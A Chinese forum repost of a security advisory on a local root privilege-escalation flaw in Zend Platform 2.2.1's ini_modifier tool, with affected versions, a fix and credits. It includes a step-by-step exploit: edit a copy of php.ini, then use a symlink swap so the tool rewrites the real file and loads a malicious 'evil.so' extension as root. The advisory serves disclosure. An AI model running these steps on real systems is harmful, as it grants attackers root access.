Zend Platform php.ini 文件修改漏洞
ZendChina官方:Zend Platform是企业级PHP应用的运行时平台环境。Zend Platform的文件安装存在权限配置错误,本地攻击者可能利用此漏洞获取权限提升。[b]漏洞起因:[/b]
配置文件设置错误
[b]影响系统:[/b]
Zend Zend Platform 2.2.1
Zend Zend Platform 2.2.1a
Zend Zend Platform 2.2.1(a)
[b]不受影响系统:[/b]
Zend Zend Platform 3.0
[b]危害:[/b]
本地攻击者可以利用漏洞无需密码修改Php.ini文件,导致特权提升。
[b]攻击所需条件:[/b]
攻击者必须访问Zend Platform。
[b]漏洞信息:[/b]
Zend Platform是一款企业级PHP应用的Run-Time平台环境。
Zend Platform包含的ini_modifier设置不正确,本地攻击者可以利用漏洞无需密码修改Php.ini文件,导致特权提升。
[b]ini_modifier用于Zend Platform中通过GUI更改php.ini文件:[/b]
$ ls -la /usr/local/Zend/sbin/ini_modifier
-rwxr-sr-x 1 root zendtech 243240 2006-08-14 16:24 ini_modifier
为了保护ini_modifier被滥用在编辑文件之前需要使用GUI密码。当它从php.ini中读取GUI密码的MD5 HASH时可通过字典或者Rainbowtable进行攻击。
因为ini_modifier可以使用-f参数打开替代的Php.ini文件,如果我们使用编辑器在它里面更改Zend GUI密码可编辑系统php.ini的一个拷贝:
[quote]
$ cd /tmp
$ mkdir ini
$ cd ini
$ cp /usr/local/Zend/etc/php.ini .
... now edit zend_gui_password in the copy to a MD5 of your choice and
... REMEBER the old MD5
$ cd ..
$ /usr/local/Zend/sbin/ini_modifier -f /tmp/ini/php.ini -n
Password:
(ini_modifier) help
modify entry - Modifies an entry.
switch extension - Enables or disables an extension.
switch zend_extension - Enables or disables a Zend extension.
help - Shows this help.
write - Writes the changes.
quit - Quits the program.
(ini_modifier) switch zend_extension /var/www/upload/evil.so on
(ini_modifier) modify entry Zend zend_gui_password OLDMD5
(ini_modifier)
[/quote]
在并行会话中可以执行如下操作:
[quote]$ cd /tmp
$ mv ini ini.bak
$ ln -s /usr/local/Zend/etc ini[/quote]
然后编辑ini文件:
[quote]
(ini_modifier) write
(ini_modifier) quit
$ cat /usr/local/Zend/etc/php.ini
[PHP]
zend_extension=/var/www/upload/evil.so
...
zend_gui_password=OLDMD5
[/quote]
在下次启动时就可以装载恶意ZEND扩展而导致以ROOT权限执行。
[b]解决方案:[/b]
升级到Zend Platform 3.0:
[url=http://www.zend.com/products/zend_platform/security_vulnerabilities]http://www.zend.com/products/zend_platform/security_vulnerabilities[/url]
[b]漏洞提供者:[/b]
Stefan Esser
漏洞消息链接 [url=http://www.php-security.org/MOPB/BONUS-07-2007.html]http://www.php-security.org/MOPB/BONUS-07-2007.html[/url]
[b]漏洞消息标题:[/b]
BONUS-07-2007:Zend Platform ini_modifier Local Root Vulnerability
[color=#ff0000]ZendChina官方资讯,转载请以链接形式注名来源:[/color][url=http://www.zendchina.net/][color=#ff0000]ZendChina[/color][/url][color=#ff0000] - [/color][url=http://bbs.zendchina.net/thread-86-1-1.html][color=#ff0000]Zend Platform php.ini 文件修改漏洞[/color][/url]
页:
[1]